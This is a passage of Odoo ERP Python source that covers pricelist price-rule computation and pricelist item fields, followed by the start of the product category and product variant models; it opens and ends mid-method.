@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
if name and operator == '=' and not args:
# search on the name of the pricelist and its currency, opposite of name_get(),
# Used by the magic context filter in the product search view.
query_args = {'name': name, 'limit': limit, 'lang': self._context.get('lang') or 'en_US'}
query = """SELECT p.id
FROM ((
SELECT pr.id, pr.name
FROM product_pricelist pr JOIN
res_currency cur ON
(pr.currency_id = cur.id)
WHERE pr.name || ' (' || cur.name || ')' = %(name)s
)
UNION (
SELECT tr.res_id as id, tr.value as name
FROM ir_translation tr JOIN
product_pricelist pr ON (
pr.id = tr.res_id AND
tr.type = 'model' AND
tr.name = 'product.pricelist,name' AND
tr.lang = %(lang)s
) JOIN
res_currency cur ON
(pr.currency_id = cur.id)
WHERE tr.value || ' (' || cur.name || ')' = %(name)s
)
) p
ORDER BY p.name"""
if limit:
query += " LIMIT %(limit)s"
self._cr.execute(query, query_args)
ids = [r[0] for r in self._cr.fetchall()]
# regular search() to apply ACLs - may limit results below limit in some cases
pricelist_ids = self._search([('id', 'in', ids)], limit=limit, access_rights_uid=name_get_uid)
if pricelist_ids:
return self.browse(pricelist_ids).name_get()
return super(Pricelist, self)._name_search(name, args, operator=operator, limit=limit, name_get_uid=name_get_uid)
def _compute_price_rule_multi(self, products_qty_partner, date=False, uom_id=False):
""" Low-level method - Multi pricelist, multi products
Returns: dict{product_id: dict{pricelist_id: (price, suitable_rule)} }"""
if not self.ids:
pricelists = self.search([])
else:
pricelists = self
results = {}
for pricelist in pricelists:
subres = pricelist._compute_price_rule(products_qty_partner, date=date, uom_id=uom_id)
for product_id, price in subres.items():
results.setdefault(product_id, {})
results[product_id][pricelist.id] = price
return results
@api.multi
def _compute_price_rule(self, products_qty_partner, date=False, uom_id=False):
""" Low-level method - Mono pricelist, multi products
Returns: dict{product_id: (price, suitable_rule) for the given pricelist}
Date in context can be a date, datetime, ...
:param products_qty_partner: list of typles products, quantity, partner
:param datetime date: validity date
:param ID uom_id: intermediate unit of measure
"""
self.ensure_one()
if not date:
date = self._context.get('date') or fields.Date.today()
date = fields.Date.to_date(date) # boundary conditions differ if we have a datetime
if not uom_id and self._context.get('uom'):
uom_id = self._context['uom']
if uom_id:
# rebrowse with uom if given
products = [item[0].with_context(uom=uom_id) for item in products_qty_partner]
products_qty_partner = [(products[index], data_struct[1], data_struct[2]) for index, data_struct in enumerate(products_qty_partner)]
else:
products = [item[0] for item in products_qty_partner]
if not products:
return {}
categ_ids = {}
for p in products:
categ = p.categ_id
while categ:
categ_ids[categ.id] = True
categ = categ.parent_id
categ_ids = list(categ_ids)
is_product_template = products[0]._name == "product.template"
if is_product_template:
prod_tmpl_ids = [tmpl.id for tmpl in products]
# all variants of all products
prod_ids = [p.id for p in
list(chain.from_iterable([t.product_variant_ids for t in products]))]
else:
prod_ids = [product.id for product in products]
prod_tmpl_ids = [product.product_tmpl_id.id for product in products]
# Load all rules
self._cr.execute(
'SELECT item.id '
'FROM product_pricelist_item AS item '
'LEFT JOIN product_category AS categ '
'ON item.categ_id = categ.id '
'WHERE (item.product_tmpl_id IS NULL OR item.product_tmpl_id = any(%s))'
'AND (item.product_id IS NULL OR item.product_id = any(%s))'
'AND (item.categ_id IS NULL OR item.categ_id = any(%s)) '
'AND (item.pricelist_id = %s) '
'AND (item.date_start IS NULL OR item.date_start<=%s) '
'AND (item.date_end IS NULL OR item.date_end>=%s)'
'ORDER BY item.applied_on, item.min_quantity desc, categ.complete_name desc, item.id desc',
(prod_tmpl_ids, prod_ids, categ_ids, self.id, date, date))
# NOTE: if you change `order by` on that query, make sure it matches
# _order from model to avoid inconstencies and undeterministic issues.
item_ids = [x[0] for x in self._cr.fetchall()]
items = self.env['product.pricelist.item'].browse(item_ids)
results = {}
for product, qty, partner in products_qty_partner:
results[product.id] = 0.0
suitable_rule = False
# Final unit price is computed according to `qty` in the `qty_uom_id` UoM.
# An intermediary unit price may be computed according to a different UoM, in
# which case the price_uom_id contains that UoM.
# The final price will be converted to match `qty_uom_id`.
qty_uom_id = self._context.get('uom') or product.uom_id.id
price_uom_id = product.uom_id.id
qty_in_product_uom = qty
if qty_uom_id != product.uom_id.id:
try:
qty_in_product_uom = self.env['uom.uom'].browse([self._context['uom']])._compute_quantity(qty, product.uom_id)
except UserError:
# Ignored - incompatible UoM in context, use default product UoM
pass
# if Public user try to access standard price from website sale, need to call price_compute.
# TDE SURPRISE: product can actually be a template
price = product.price_compute('list_price')[product.id]
price_uom = self.env['uom.uom'].browse([qty_uom_id])
for rule in items:
if rule.min_quantity and qty_in_product_uom < rule.min_quantity:
continue
if is_product_template:
if rule.product_tmpl_id and product.id != rule.product_tmpl_id.id:
continue
if rule.product_id and not (product.product_variant_count == 1 and product.product_variant_id.id == rule.product_id.id):
# product rule acceptable on template if has only one variant
continue
else:
if rule.product_tmpl_id and product.product_tmpl_id.id != rule.product_tmpl_id.id:
continue
if rule.product_id and product.id != rule.product_id.id:
continue
if rule.categ_id:
cat = product.categ_id
while cat:
if cat.id == rule.categ_id.id:
break
cat = cat.parent_id
if not cat:
continue
if rule.base == 'pricelist' and rule.base_pricelist_id:
price_tmp = rule.base_pricelist_id._compute_price_rule([(product, qty, partner)])[product.id][0] # TDE: 0 = price, 1 = rule
price = rule.base_pricelist_id.currency_id._convert(price_tmp, self.currency_id, self.env.user.company_id, date, round=False)
else:
# if base option is public price take sale price else cost price of product
# price_compute returns the price in the context UoM, i.e. qty_uom_id
price = product.price_compute(rule.base)[product.id]
convert_to_price_uom = (lambda price: product.uom_id._compute_price(price, price_uom))
if price is not False:
if rule.compute_price == 'fixed':
price = convert_to_price_uom(rule.fixed_price)
elif rule.compute_price == 'percentage':
price = (price - (price * (rule.percent_price / 100))) or 0.0
else:
# complete formula
price_limit = price
price = (price - (price * (rule.price_discount / 100))) or 0.0
if rule.price_round:
price = tools.float_round(price, precision_rounding=rule.price_round)
if rule.price_surcharge:
price_surcharge = convert_to_price_uom(rule.price_surcharge)
price += price_surcharge
if rule.price_min_margin:
price_min_margin = convert_to_price_uom(rule.price_min_margin)
price = max(price, price_limit + price_min_margin)
if rule.price_max_margin:
price_max_margin = convert_to_price_uom(rule.price_max_margin)
price = min(price, price_limit + price_max_margin)
suitable_rule = rule
break
# Final price conversion into pricelist currency
if suitable_rule and suitable_rule.compute_price != 'fixed' and suitable_rule.base != 'pricelist':
if suitable_rule.base == 'standard_price':
cur = product.cost_currency_id
else:
cur = product.currency_id
price = cur._convert(price, self.currency_id, self.env.user.company_id, date, round=False)
results[product.id] = (price, suitable_rule and suitable_rule.id or False)
return results
# New methods: product based
def get_products_price(self, products, quantities, partners, date=False, uom_id=False):
""" For a given pricelist, return price for products
Returns: dict{product_id: product price}, in the given pricelist """
self.ensure_one()
return {
product_id: res_tuple[0]
for product_id, res_tuple in self._compute_price_rule(
list(pycompat.izip(products, quantities, partners)),
date=date,
uom_id=uom_id
).items()
}
def get_product_price(self, product, quantity, partner, date=False, uom_id=False):
""" For a given pricelist, return price for a given product """
self.ensure_one()
return self._compute_price_rule([(product, quantity, partner)], date=date, uom_id=uom_id)[product.id][0]
def get_product_price_rule(self, product, quantity, partner, date=False, uom_id=False):
""" For a given pricelist, return price and rule for a given product """
self.ensure_one()
return self._compute_price_rule([(product, quantity, partner)], date=date, uom_id=uom_id)[product.id]
# Compatibility to remove after v10 - DEPRECATED
@api.model
def _price_rule_get_multi(self, pricelist, products_by_qty_by_partner):
""" Low level method computing the result tuple for a given pricelist and multi products - return tuple """
return pricelist._compute_price_rule(products_by_qty_by_partner)
@api.multi
def price_get(self, prod_id, qty, partner=None):
""" Multi pricelist, mono product - returns price per pricelist """
return {key: price[0] for key, price in self.price_rule_get(prod_id, qty, partner=partner).items()}
@api.multi
def price_rule_get_multi(self, products_by_qty_by_partner):
""" Multi pricelist, multi product - return tuple """
return self._compute_price_rule_multi(products_by_qty_by_partner)
@api.multi
def price_rule_get(self, prod_id, qty, partner=None):
""" Multi pricelist, mono product - return tuple """
product = self.env['product.product'].browse([prod_id])
return self._compute_price_rule_multi([(product, qty, partner)])[prod_id]
@api.model
def _price_get_multi(self, pricelist, products_by_qty_by_partner):
""" Mono pricelist, multi product - return price per product """
return pricelist.get_products_price(
list(pycompat.izip(**products_by_qty_by_partner)))
# DEPRECATED (Not used anymore, see d39d583b2) -> Remove me in master (saas12.3)
def _get_partner_pricelist(self, partner_id, company_id=None):
""" Retrieve the applicable pricelist for a given partner in a given company.
:param company_id: if passed, used for looking up properties,
instead of current user's company
"""
res = self._get_partner_pricelist_multi([partner_id], company_id)
return res[partner_id].id
def _get_partner_pricelist_multi_search_domain_hook(self):
return []
def _get_partner_pricelist_multi_filter_hook(self):
return self
def _get_partner_pricelist_multi(self, partner_ids, company_id=None):
""" Retrieve the applicable pricelist for given partners in a given company.
It will return the first found pricelist in this order:
First, the pricelist of the specific property (res_id set), this one
is created when saving a pricelist on the partner form view.
Else, it will return the pricelist of the partner country group
Else, it will return the generic property (res_id not set), this one
is created on the company creation.
Else, it will return the first available pricelist
:param company_id: if passed, used for looking up properties,
instead of current user's company
:return: a dict {partner_id: pricelist}
"""
# `partner_ids` might be ID from inactive uers. We should use active_test
# as we will do a search() later (real case for website public user).
Partner = self.env['res.partner'].with_context(active_test=False)
Property = self.env['ir.property'].with_context(force_company=company_id or self.env.user.company_id.id)
Pricelist = self.env['product.pricelist']
pl_domain = self._get_partner_pricelist_multi_search_domain_hook()
# if no specific property, try to find a fitting pricelist
result = Property.get_multi('property_product_pricelist', Partner._name, partner_ids)
remaining_partner_ids = [pid for pid, val in result.items() if not val or
not val._get_partner_pricelist_multi_filter_hook()]
if remaining_partner_ids:
# get fallback pricelist when no pricelist for a given country
pl_fallback = (
Pricelist.search(pl_domain + [('country_group_ids', '=', False)], limit=1) or
Property.get('property_product_pricelist', 'res.partner') or
Pricelist.search(pl_domain, limit=1)
)
# group partners by country, and find a pricelist for each country
domain = [('id', 'in', remaining_partner_ids)]
groups = Partner.read_group(domain, ['country_id'], ['country_id'])
for group in groups:
country_id = group['country_id'] and group['country_id'][0]
pl = Pricelist.search(pl_domain + [('country_group_ids.country_ids', '=', country_id)], limit=1)
pl = pl or pl_fallback
for pid in Partner.search(group['__domain']).ids:
result[pid] = pl
return result
@api.model
def get_import_templates(self):
return [{
'label': _('Import Template for Pricelists'),
'template': '/product/static/xls/product_pricelist.xls'
}]
class ResCountryGroup(models.Model):
_inherit = 'res.country.group'
pricelist_ids = fields.Many2many('product.pricelist', 'res_country_group_pricelist_rel',
'res_country_group_id', 'pricelist_id', string='Pricelists')
class PricelistItem(models.Model):
_name = "product.pricelist.item"
_description = "Pricelist Item"
_order = "applied_on, min_quantity desc, categ_id desc, id desc"
# NOTE: if you change _order on this model, make sure it matches the SQL
# query built in _compute_price_rule() above in this file to avoid
# inconstencies and undeterministic issues.
product_tmpl_id = fields.Many2one(
'product.template', 'Product Template', ondelete='cascade',
help="Specify a template if this rule only applies to one product template. Keep empty otherwise.")
product_id = fields.Many2one(
'product.product', 'Product', ondelete='cascade',
help="Specify a product if this rule only applies to one product. Keep empty otherwise.")
categ_id = fields.Many2one(
'product.category', 'Product Category', ondelete='cascade',
help="Specify a product category if this rule only applies to products belonging to this category or its children categories. Keep empty otherwise.")
min_quantity = fields.Integer(
'Min. Quantity', default=0,
help="For the rule to apply, bought/sold quantity must be greater "
"than or equal to the minimum quantity specified in this field.\n"
"Expressed in the default unit of measure of the product.")
applied_on = fields.Selection([
('3_global', 'Global'),
('2_product_category', ' Product Category'),
('1_product', 'Product'),
('0_product_variant', 'Product Variant')], "Apply On",
default='3_global', required=True,
help='Pricelist Item applicable on selected option')
base = fields.Selection([
('list_price', 'Public Price'),
('standard_price', 'Cost'),
('pricelist', 'Other Pricelist')], "Based on",
default='list_price', required=True,
help='Base price for computation.\n'
'Public Price: The base price will be the Sale/public Price.\n'
'Cost Price : The base price will be the cost price.\n'
'Other Pricelist : Computation of the base price based on another Pricelist.')
base_pricelist_id = fields.Many2one('product.pricelist', 'Other Pricelist')
pricelist_id = fields.Many2one('product.pricelist', 'Pricelist', index=True, ondelete='cascade')
price_surcharge = fields.Float(
'Price Surcharge', digits=dp.get_precision('Product Price'),
help='Specify the fixed amount to add or substract(if negative) to the amount calculated with the discount.')
price_discount = fields.Float('Price Discount', default=0, digits=(16, 2))
price_round = fields.Float(
'Price Rounding', digits=dp.get_precision('Product Price'),
help="Sets the price so that it is a multiple of this value.\n"
"Rounding is applied after the discount and before the surcharge.\n"
"To have prices that end in 9.99, set rounding 10, surcharge -0.01")
price_min_margin = fields.Float(
'Min. Price Margin', digits=dp.get_precision('Product Price'),
help='Specify the minimum amount of margin over the base price.')
price_max_margin = fields.Float(
'Max. Price Margin', digits=dp.get_precision('Product Price'),
help='Specify the maximum amount of margin over the base price.')
company_id = fields.Many2one(
'res.company', 'Company',
readonly=True, related='pricelist_id.company_id', store=True)
currency_id = fields.Many2one(
'res.currency', 'Currency',
readonly=True, related='pricelist_id.currency_id', store=True)
date_start = fields.Date('Start Date', help="Starting date for the pricelist item validation")
date_end = fields.Date('End Date', help="Ending valid for the pricelist item validation")
compute_price = fields.Selection([
('fixed', 'Fix Price'),
('percentage', 'Percentage (discount)'),
('formula', 'Formula')], index=True, default='fixed')
fixed_price = fields.Float('Fixed Price', digits=dp.get_precision('Product Price'))
percent_price = fields.Float('Percentage Price')
# functional fields used for usability purposes
name = fields.Char(
'Name', compute='_get_pricelist_item_name_price',
help="Explicit rule name for this pricelist line.")
price = fields.Char(
'Price', compute='_get_pricelist_item_name_price',
help="Explicit rule name for this pricelist line.")
@api.constrains('base_pricelist_id', 'pricelist_id', 'base')
def _check_recursion(self):
if any(item.base == 'pricelist' and item.pricelist_id and item.pricelist_id == item.base_pricelist_id for item in self):
raise ValidationError(_('You cannot assign the Main Pricelist as Other Pricelist in PriceList Item'))
return True
@api.constrains('price_min_margin', 'price_max_margin')
def _check_margin(self):
if any(item.price_min_margin > item.price_max_margin for item in self):
raise ValidationError(_('The minimum margin should be lower than the maximum margin.'))
return True
@api.one
@api.depends('categ_id', 'product_tmpl_id', 'product_id', 'compute_price', 'fixed_price', \
'pricelist_id', 'percent_price', 'price_discount', 'price_surcharge')
def _get_pricelist_item_name_price(self):
if self.categ_id:
self.name = _("Category: %s") % (self.categ_id.name)
elif self.product_tmpl_id:
self.name = self.product_tmpl_id.name
elif self.product_id:
self.name = self.product_id.display_name.replace('[%s]' % self.product_id.code, '')
else:
self.name = _("All Products")
if self.compute_price == 'fixed':
self.price = ("%s %s") % (self.fixed_price, self.pricelist_id.currency_id.name)
elif self.compute_price == 'percentage':
self.price = _("%s %% discount") % (self.percent_price)
else:
self.price = _("%s %% discount and %s surcharge") % (self.price_discount, self.price_surcharge)
@api.onchange('applied_on')
def _onchange_applied_on(self):
if self.applied_on != '0_product_variant':
self.product_id = False
if self.applied_on != '1_product':
self.product_tmpl_id = False
if self.applied_on != '2_product_category':
self.categ_id = False
@api.onchange('compute_price')
def _onchange_compute_price(self):
if self.compute_price != 'fixed':
self.fixed_price = 0.0
if self.compute_price != 'percentage':
self.percent_price = 0.0
if self.compute_price != 'formula':
self.update({
'price_discount': 0.0,
'price_surcharge': 0.0,
'price_round': 0.0,
'price_min_margin': 0.0,
'price_max_margin': 0.0,
})
@api.multi
def write(self, values):
res = super(PricelistItem, self).write(values)
# When the pricelist changes we need the product.template price
# to be invalided and recomputed.
self.invalidate_cache()
return res
```
#### File: product/models/product.py
```python
import logging
import re
from odoo import api, fields, models, tools, _
from odoo.exceptions import ValidationError
from odoo.osv import expression
from odoo.addons import decimal_precision as dp
from odoo.tools import float_compare, pycompat
_logger = logging.getLogger(__name__)
class ProductCategory(models.Model):
_name = "product.category"
_description = "Product Category"
_parent_name = "parent_id"
_parent_store = True
_rec_name = 'complete_name'
_order = 'complete_name'
name = fields.Char('Name', index=True, required=True, translate=True)
complete_name = fields.Char(
'Complete Name', compute='_compute_complete_name',
store=True)
parent_id = fields.Many2one('product.category', 'Parent Category', index=True, ondelete='cascade')
parent_path = fields.Char(index=True)
child_id = fields.One2many('product.category', 'parent_id', 'Child Categories')
product_count = fields.Integer(
'# Products', compute='_compute_product_count',
help="The number of products under this category (Does not consider the children categories)")
@api.depends('name', 'parent_id.complete_name')
def _compute_complete_name(self):
for category in self:
if category.parent_id:
category.complete_name = '%s / %s' % (category.parent_id.complete_name, category.name)
else:
category.complete_name = category.name
def _compute_product_count(self):
read_group_res = self.env['product.template'].read_group([('categ_id', 'child_of', self.ids)], ['categ_id'], ['categ_id'])
group_data = dict((data['categ_id'][0], data['categ_id_count']) for data in read_group_res)
for categ in self:
product_count = 0
for sub_categ_id in categ.search([('id', 'child_of', categ.id)]).ids:
product_count += group_data.get(sub_categ_id, 0)
categ.product_count = product_count
@api.constrains('parent_id')
def _check_category_recursion(self):
if not self._check_recursion():
raise ValidationError(_('You cannot create recursive categories.'))
return True
@api.model
def name_create(self, name):
return self.create({'name': name}).name_get()[0]
class ProductPriceHistory(models.Model):
""" Keep track of the ``product.template`` standard prices as they are changed. """
_name = 'product.price.history'
_rec_name = 'datetime'
_order = 'datetime desc'
_description = 'Product Price List History'
def _get_default_company_id(self):
return self._context.get('force_company', self.env.user.company_id.id)
company_id = fields.Many2one('res.company', string='Company',
default=_get_default_company_id, required=True)
product_id = fields.Many2one('product.product', 'Product', ondelete='cascade', required=True)
datetime = fields.Datetime('Date', default=fields.Datetime.now)
cost = fields.Float('Cost', digits=dp.get_precision('Product Price'))
class ProductProduct(models.Model):
_name = "product.product"
_description = "Product"
_inherits = {'product.template': 'product_tmpl_id'}
_inherit = ['mail.thread', 'mail.activity.mixin']
_order = 'default_code, name, id'
# price: total price, context dependent (partner, pricelist, quantity)
price = fields.Float(
'Price', compute='_compute_product_price',
digits=dp.get_precision('Product Price'), inverse='_set_product_price')
# price_extra: catalog extra value only, sum of variant extra attributes
price_extra = fields.Float(
'Variant Price Extra', compute='_compute_product_price_extra',
digits=dp.get_precision('Product Price'),
help="This is the sum of the extra price of all attributes")
# lst_price: catalog value + extra, context dependent (uom)
lst_price = fields.Float(
'Sale Price', compute='_compute_product_lst_price',
digits=dp.get_precision('Product Price'), inverse='_set_product_lst_price',
help="The sale price is managed from the product template. Click on the 'Configure Variants' button to set the extra attribute prices.")
default_code = fields.Char('Internal Reference', index=True)
code = fields.Char('Reference', compute='_compute_product_code')
partner_ref = fields.Char('Customer Ref', compute='_compute_partner_ref')
active = fields.Boolean(
'Active', default=True,
help="If unchecked, it will allow you to hide the product without removing it.")
product_tmpl_id = fields.Many2one(
'product.template', 'Product Template',
auto_join=True, index=True, ondelete="cascade", required=True)
barcode = fields.Char(
'Barcode', copy=False, oldname='ean13',
help="International Article Number used for product identification.")
attribute_value_ids = fields.Many2many(
'product.attribute.value', string='Attribute Values', ondelete='restrict')
product_template_attribute_value_ids = fields.Many2many(
'product.template.attribute.value', string='Template Attribute Values', compute="_compute_product_template_attribute_value_ids")
# image: all image fields are base64 encoded and PIL-supported
image_variant = fields.Binary(
"Variant Image", attachment=True,
help="This field holds the image used as image for the product variant, limited to 1024x1024px.")
image = fields.Binary(
"Big-sized image", compute='_compute_images', inverse='_set_image',
help="Image of the product variant (Big-sized image of product template if false). It is automatically "
"resized as a 1024x1024px image, with aspect ratio preserved.")
image_small = fields.Binary(
"Small-sized image", compute='_compute_images', inverse='_set_image_small',
help="Image of the product variant (Small-sized image of product template if false).")
image_medium = fields.Binary(
"Medium-sized image", compute='_compute_images', inverse='_set_image_medium',
help="Image of the product variant (Medium-sized image of product template if false).")
is_product_variant = fields.Boolean(compute='_compute_is_product_variant')
standard_price = fields.Float(
'Cost', company_dependent=True,
digits=dp.get_precision('Product Price'),
groups="base.group_user",
help = "Cost used for stock valuation in standard price and as a first price to set in average/fifo. "
"Also used as a base price for pricelists. "
"Expressed in the default unit of measure of the product.")
volume = fields.Float('Volume', help="The volume in m3.")
weight = fields.Float(
'Weight', digits=dp.get_precision('Stock Weight'),
help="Weight of the product, packaging not included. The unit of measure can be changed in the general settings")
pricelist_item_ids = fields.Many2many(
'product.pricelist.item', 'Pricelist Items', compute='_get_pricelist_items')
packaging_ids = fields.One2many(
'product.packaging', 'product_id', 'Product Packages',
help="Gives the different ways to package the same product.")
_sql_constraints = [
('barcode_uniq', 'unique(barcode)', "A barcode can only be assigned to one product !"),
]
def _get_invoice_policy(self):
return False
def _compute_is_product_variant(self):
for product in self:
product.is_product_variant = True
def _compute_product_price(self):
prices = {}
pricelist_id_or_name = self._context.get('pricelist')
if pricelist_id_or_name:
pricelist = None
partner = self.env.context.get('partner', False)
quantity = self.env.context.get('quantity', 1.0)
# Support context pricelists specified as display_name or ID for compatibility
if isinstance(pricelist_id_or_name, pycompat.string_types):
pricelist_name_search = self.env['product.pricelist'].name_search(pricelist_id_or_name, operator='=', limit=1)
if pricelist_name_search:
pricelist = self.env['product.pricelist'].browse([pricelist_name_search[0][0]])
elif isinstance(pricelist_id_or_name, pycompat.integer_types):
pricelist = self.env['product.pricelist'].browse(pricelist_id_or_name)
if pricelist:
quantities = [quantity] * len(self)
partners = [partner] * len(self)
prices = pricelist.get_products_price(self, quantities, partners)
for product in self:
product.price = prices.get(product.id, 0.0)
def _set_product_price(self):
for product in self:
if self._context.get('uom'):
value = self.env['uom.uom'].browse(self._context['uom'])._compute_price(product.price, product.uom_id)
else:
value = product.price
value -= product.price_extra
product.write({'list_price': value})
def _set_product_lst_price(self):
for product in self:
if self._context.get('uom'):
value = self.env['uom.uom'].browse(self._context['uom'])._compute_price(product.lst_price, product.uom_id)
else:
value = product.lst_price
value -= product.price_extra
product.write({'list_price': value})
@api.depends('product_template_attribute_value_ids.price_extra')
def _compute_product_price_extra(self):
for product in self:
product.price_extra = sum(product.mapped('product_template_attribute_value_ids.price_extra'))
@api.depends('list_price', 'price_extra')
def _compute_product_lst_price(self):
to_uom = None
if 'uom' in self._context:
to_uom = self.env['uom.uom'].browse([self._context['uom']])
for product in self:
if to_uom:
list_price = product.uom_id._compute_price(product.list_price, to_uom)
else:
list_price = product.list_price
product.lst_price = list_price + product.price_extra
@api.one
def _compute_product_code(self):
for supplier_info in self.seller_ids:
if supplier_info.name.id == self._context.get('partner_id'):
self.code = supplier_info.product_code or self.default_code
break
else:
self.code = self.default_code
@api.one
def _compute_partner_ref(self):
for supplier_info in self.seller_ids:
if supplier_info.name.id == self._context.get('partner_id'):
product_name = supplier_info.product_name or self.default_code or self.name
self.partner_ref = '%s%s' % (self.code and '[%s] ' % self.code or '', product_name)
break
else:
self.partner_ref = self.name_get()[0][1]
@api.one
@api.depends('image_variant', 'product_tmpl_id.image')
def _compute_images(self):
if self._context.get('bin_size'):
self.image_medium = self.image_variant
self.image_small = self.image_variant
self.image = self.image_variant
else:
resized_images = tools.image_get_resized_images(self.image_variant, return_big=True, avoid_resize_medium=True)
self.image_medium = resized_images['image_medium']
self.image_small = resized_images['image_small']
self.image = resized_images['image']
if not self.image_medium:
self.image_medium = self.product_tmpl_id.image_medium
if not self.image_small:
self.image_small = self.product_tmpl_id.image_small
if not self.image:
self.image = self.product_tmpl_id.image
@api.one
def _set_image(self):
self._set_image_value(self.image)
@api.one
def _set_image_medium(self):
self._set_image_value(self.image_medium)
@api.one
def _set_image_small(self):
self._set_image_value(self.image_small)
@api.one
def _set_image_value(self, value):
if isinstance(value, pycompat.text_type):
value = value.encode('ascii')
image = tools.image_resize_image_big(value)
# This is needed because when there is only one variant, the user
# doesn't know there is a difference between template and variant, he
# expects both images to be the same.
if self.product_tmpl_id.image and self.product_variant_count > 1:
self.image_variant = image
else:
self.image_variant = False
self.product_tmpl_id.image = image
@api.depends('product_tmpl_id', 'attribute_value_ids')
def _compute_product_template_attribute_value_ids(self):
# Fetch and pre-map the values first for performance. It assumes there
# won't be too many values, but there might be a lot of products.
values = self.env['product.template.attribute.value'].search([
('product_tmpl_id', 'in', self.mapped('product_tmpl_id').ids),
('product_attribute_value_id', 'in', self.mapped('attribute_value_ids').ids),
])
values_per_template = {}
for ptav in values:
pt_id = ptav.product_tmpl_id.id
if pt_id not in values_per_template:
values_per_template[pt_id] = {}
values_per_template[pt_id][ptav.product_attribute_value_id.id] = ptav
for product in self:
product.product_template_attribute_value_ids = self.env['product.template.attribute.value']
for pav in product.attribute_value_ids:
if product.product_tmpl_id.id not in values_per_template or pav.id not in values_per_template[product.product_tmpl_id.id]:
_logger.warning("A matching product.template.attribute.value was not found for the product.attribute.value #%s on the template #%s" % (pav.id, product.product_tmpl_id.id))
else:
product.product_template_attribute_value_ids += values_per_template[product.product_tmpl_id.id][pav.id]
@api.one
def _get_pricelist_items(self):
self.pricelist_item_ids = self.env['product.pricelist.item'].search([
'|',
('product_id', '=', self.id),
('product_tmpl_id', '=', self.product_tmpl_id.id)]).ids
@api.constrains('attribute_value_ids')
def _check_attribute_value_ids(self):
for product in self:
attributes = self.env['product.attribute']
for value in product.attribute_value_ids:
if value.attribute_id in attributes:
raise ValidationError(_('Error! It is not allowed to choose more than one value for a given attribute.'))
if value.attribute_id.create_variant == 'always':
attributes |= value.attribute_id
return True
@api.onchange('uom_id', 'uom_po_id')
def _onchange_uom(self):
if self.uom_id and self.uom_po_id and self.uom_id.category_id != self.uom_po_id.category_id:
self.uom_po_id = self.uom_id
@api.model_create_multi
def create(self, vals_list):
products = super(ProductProduct, self.with_context(create_product_product=True)).create(vals_list)
for product, vals in pycompat.izip(products, vals_list):
# When a unique variant is created from tmpl then the standard price is set by _set_standard_price
if not (self.env.context.get('create_from_tmpl') and len(product.product_tmpl_id.product_variant_ids) == 1):
product._set_standard_price(vals.get('standard_price') or 0.0)
# `_get_variant_id_for_combination` depends on existing variants
self.clear_caches()
self.env['product.template'].invalidate_cache(
fnames=[
'valid_archived_variant_ids',
'valid_existing_variant_ids',
'product_variant_ids',
'product_variant_id',
'product_variant_count'
],
ids=products.mapped('product_tmpl_id').ids
)
return products
@api.multi
def write(self, values):
''' Store the standard price change in order to be able to retrieve the cost of a product for a given date'''
res = super(ProductProduct, self).write(values)
if 'standard_price' in values:
self._set_standard_price(values['standard_price'])
if 'attribute_value_ids' in values:
# `_get_variant_id_for_combination` depends on `attribute_value_ids`
self.clear_caches()
if 'active' in values:
# prefetched o2m have to be reloaded (because of active_test)
# (eg. product.template: product_variant_ids)
self.invalidate_cache()
# `_get_first_possible_variant_id` depends on variants active state
self.clear_caches()
return res
@api.multi
def unlink(self):
unlink_products = self.env['product.product']
unlink_templates = self.env['product.template']
for product in self:
# Check if product still exists, in case it has been unlinked by unlinking its template
if not product.exists():
continue
# Check if the product is last product of this template...
other_products = self.search([('product_tmpl_id', '=', product.product_tmpl_id.id), ('id', '!=', product.id)])
# ... and do not delete product template if it's configured to be created "on demand"
if not other_products and not product.product_tmpl_id.has_dynamic_attributes():
unlink_templates |= product.product_tmpl_id
unlink_products |= product
res = super(ProductProduct, unlink_products).unlink()
# delete templates after calling super, as deleting template could lead to deleting
# products due to ondelete='cascade'
unlink_templates.unlink()
# `_get_variant_id_for_combination` depends on existing variants
self.clear_caches()
return res
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
# TDE FIXME: clean context / variant brol
if default is None:
default = {}
if self._context.get('variant'):
# if we copy a variant or create one, we keep the same template
default['product_tmpl_id'] = self.product_tmpl_id.id
elif 'name' not in default:
default['name'] = self.name
return super(ProductProduct, self).copy(default=default)
@api.model
def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):
# TDE FIXME: strange
if self._context.get('search_default_categ_id'):
args.append((('categ_id', 'child_of', self._context['search_default_categ_id'])))
return super(ProductProduct, self)._search(args, offset=offset, limit=limit, order=order, count=count, access_rights_uid=access_rights_uid)
@api.multi
def name_get(self):
# TDE: this could be cleaned a bit I think
def _name_get(d):
name = d.get('name', '')
code = self._context.get('display_default_code', True) and d.get('default_code', False) or False
if code:
name = '[%s] %s' % (code,name)
return (d['id'], name)
partner_id = self._context.get('partner_id')
if partner_id:
partner_ids = [partner_id, self.env['res.partner'].browse(partner_id).commercial_partner_id.id]
else:
partner_ids = []
# all user don't have access to seller and partner
# check access and use superuser
self.check_access_rights("read")
self.check_access_rule("read")
result = []
# Prefetch the fields used by the `name_get`, so `browse` doesn't fetch other fields
# Use `load=False` to not call `name_get` for the `product_tmpl_id`
self.sudo().read(['name', 'default_code', 'product_tmpl_id', 'attribute_value_ids', 'attribute_line_ids'], load=False)
product_template_ids = self.sudo().mapped('product_tmpl_id').ids
if partner_ids:
supplier_info = self.env['product.supplierinfo'].sudo().search([
('product_tmpl_id', 'in', product_template_ids),
('name', 'in', partner_ids),
])
# Prefetch the fields used by the `name_get`, so `browse` doesn't fetch other fields
# Use `load=False` to not call `name_get` for the `product_tmpl_id` and `product_id`
supplier_info.sudo().read(['product_tmpl_id', 'product_id', 'product_name', 'product_code'], load=False)
supplier_info_by_template = {}
for r in supplier_info:
supplier_info_by_template.setdefault(r.product_tmpl_id, []).append(r)
for product in self.sudo():
# display only the attributes with multiple possible values on the template
variable_attributes = product.attribute_line_ids.filtered(lambda l: len(l.value_ids) > 1).mapped('attribute_id')
variant = product.attribute_value_ids._variant_name(variable_attributes)
name = variant and "%s (%s)" % (product.name, variant) or product.name
sellers = []
if partner_ids:
product_supplier_info = supplier_info_by_template.get(product.product_tmpl_id, [])
sellers = [x for x in product_supplier_info if x.product_id and x.product_id == product]
if not sellers:
sellers = [x for x in product_supplier_info if not x.product_id]
if sellers:
for s in sellers:
seller_variant = s.product_name and (
variant and "%s (%s)" % (s.product_name, variant) or s.product_name
) or False
mydict = {
'id': product.id,
'name': seller_variant or name,
'default_code': s.product_code or product.default_code,
}
temp = _name_get(mydict)
if temp not in result:
